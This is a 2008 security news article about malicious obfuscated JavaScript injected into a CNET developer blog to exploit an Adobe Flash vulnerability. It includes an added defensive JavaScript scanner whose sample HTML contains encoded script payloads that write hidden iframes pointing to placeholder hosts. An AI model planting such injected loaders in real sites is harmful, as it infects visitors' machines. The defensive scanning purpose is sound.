CyberInsecure.com

Daily cyber threats and internet security news: network security, online safety and latest security alerts
August 8th, 2008

Malicious JavaScript Code In Another CNET Networks Website

Websense has discovered that another CNET Networks site, the CNET Clientside Developer Blog, has been compromised, just 5 months after the previous incident. The main page of this website contains malicious JavaScript code that de-obfuscates into an iframe, which loads its primary malicious payload from a different host. The malicious JavaScript attempts to reach the live exploit URL on a .info domain that is now down.

The malicious code has been observed exploiting a known integer overflow vulnerability in Adobe Flash (CVE-2007-0071). At the time of this alert, the site is still hosting the malicious code. Visitors who are not patched against this vulnerability will be infected without any user interaction.

The Clientside developer blog has been injected with malicious JavaScript code that attempts to exploit visitors through a well-known vulnerability in Adobe Flash Player. Software vulnerable to this attack includes Adobe Flash Player version 9.0.115.0 and earlier, Adobe Flex 3.0, and Adobe AIR 1.0.
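The pattern described above, an inline script whose encoded literals decode to an iframe on a different host, can be checked statically when triaging a page. The following is an added example, not code from Websense or from the compromised site; it assumes the obfuscation uses `unescape` or `String.fromCharCode` literals (the article does not say which technique was used), and the sample HTML and host names are constructed placeholders.

```javascript
// Added example: static triage of a page for script-injected off-site iframes.
// Nothing from the page is executed; encoded literals are decoded as data only.

// Constructed sample. Hosts are placeholders, not indicators from the incident.
const SAMPLE_HTML = [
  '<html><body><h1>Developer blog</h1>',
  '<iframe src="http://blog.example.com/widget" width="300" height="200"></iframe>',
  "<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A//payload.example.invalid/in.html%22%20width%3D0%20height%3D0%3E%3C/iframe%3E'));</script>",
  '<script>var s=String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,104,116,116,112,58,47,47,99,100,110,46,101,120,97,109,112,108,101,46,105,110,118,97,108,105,100,47,62);document.write(s);</script>',
  '</body></html>',
].join('\n');

// Return the bodies of all inline <script> elements.
function inlineScripts(html) {
  return [...html.matchAll(/<script\b[^>]*>([\s\S]*?)<\/script>/gi)].map(m => m[1]);
}

// Replace unescape('...') and String.fromCharCode(n, ...) literals with their
// decoded text, repeating a few rounds to peel nested layers.
function decodeLiterals(js, maxRounds = 5) {
  let out = js;
  for (let i = 0; i < maxRounds; i++) {
    const next = out
      .replace(/unescape\(\s*(['"])((?:(?!\1).)*)\1\s*\)/g, (_, q, body) => unescape(body))
      .replace(/String\.fromCharCode\(([\d\s,]+)\)/g, (_, nums) =>
        String.fromCharCode(...nums.split(',').map(Number)));
    if (next === out) break;
    out = next;
  }
  return out;
}

// Find iframe tags in decoded text; record the source host and whether the frame is hidden.
function findIframes(text, pageHost) {
  const hits = [];
  for (const m of text.matchAll(/<iframe\b([^>]*)>/gi)) {
    const src = /\bsrc\s*=\s*["']?([^"'\s>]+)/i.exec(m[1]);
    if (!src) continue;
    let host;
    try { host = new URL(src[1], `http://${pageHost}/`).hostname; } catch { continue; }
    const hidden = /\b(?:width|height)\s*=\s*["']?[01](?!\d)|display\s*:\s*none|visibility\s*:\s*hidden/i.test(m[1]);
    hits.push({ src: src[1], host, offSite: host !== pageHost, hidden });
  }
  return hits;
}

// Report iframes that only appear once script literals are decoded and that load from another host.
function scanPage(html, pageHost) {
  return inlineScripts(html).flatMap(js => findIframes(decodeLiterals(js), pageHost)).filter(f => f.offSite);
}

console.log(JSON.stringify(scanPage(SAMPLE_HTML, 'blog.example.com'), null, 2));
```

A hit is a reason to inspect the page, not a verdict: other encodings will evade these two patterns, and legitimate scripts also write off-site frames.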

This malware attack is not an isolated event. Attacks in which legitimate sites are made to serve malware and exploits have lately become very popular. Multiple vendors are confirming this trend: in its latest report, ScanSafe found a 407 percent increase in compromises of legitimate websites; according to Sophos, 79 percent of malware-hosting Web sites are legitimate ones; and according to Websense, more than 75 percent of the Web sites classified as malicious were actually legitimate ones. Those studies show that the old security advice, “stay away from unknown websites”, will soon become irrelevant.
